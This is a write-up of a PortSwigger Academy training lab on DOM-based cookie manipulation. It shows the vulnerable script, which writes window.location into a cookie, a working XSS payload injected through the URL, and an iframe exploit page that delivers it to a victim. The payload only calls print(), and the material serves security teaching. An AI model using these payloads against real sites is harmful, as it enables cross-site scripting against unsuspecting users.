siunam's Website

My personal website

Home Writeups Research Blog Projects About

DOM-based cookie manipulation | Jan 14, 2023

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you'll learn: DOM-based cookie manipulation! Without further ado, let's dive in.

Background

This lab demonstrates DOM-based client-side cookie manipulation. To solve this lab, inject a cookie that will cause XSS on a different page and call the print() function. You will need to use the exploit server to direct the victim to the correct pages.

Exploitation

Home page:

In the home page, we can view other products:

View source page:

<script>
    document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>

In here, we see a document.cookie sink (Dangerous function). And the source (attacker controllable input) is window.location.

That being said, it'll set a new cookie called lastViewdProduct, with the value of our window.location property.

Let's refresh the page:

<a href='https://0af2006504761747c0200a5f001a0028.web-security-academy.net/product?productId=1'>Last viewed product</a><p>|</p>

When we refreshed the page, it'll create a new <a> element, with attribute href, and it's value is our window.location property.

That being said, we can try to exploit XSS!

Payload:

/product?productId=1&payload='><img src=errorpls onerror="print()">

Our evil cookie has been set!

Let's refresh the page:

Nice!

Now, we can create a HTML payload to trigger the XSS payload to the victim:

<html>
    <head>
        <title>DOM-based cookie manipulation</title>
    </head>
    <body>
        <iframe src="https://0af2006504761747c0200a5f001a0028.web-security-academy.net/product?productId=1&payload=%27%3E%3Cimg%20src%3Derrorpls%20onerror%3D%22print%28%29%22%3E" onload="if(!window.triggerXSSPayload)this.src='https://0af2006504761747c0200a5f001a0028.web-security-academy.net';window.triggerXSSPayload=1;"></iframe>
    </body>
</html>

This payload will create an <iframe> element that pointing to our set cookie payload.

Then, when it's loaded, we checks the XSS payload triggered or not.

If not, then set the <iframe> attribute src property to the vulnerable website's home page. This will trigger our cookie's XSS payload.

Then host it on the exploit server, and deliver it to victim:

What we've learned:

  1. DOM-based cookie manipulation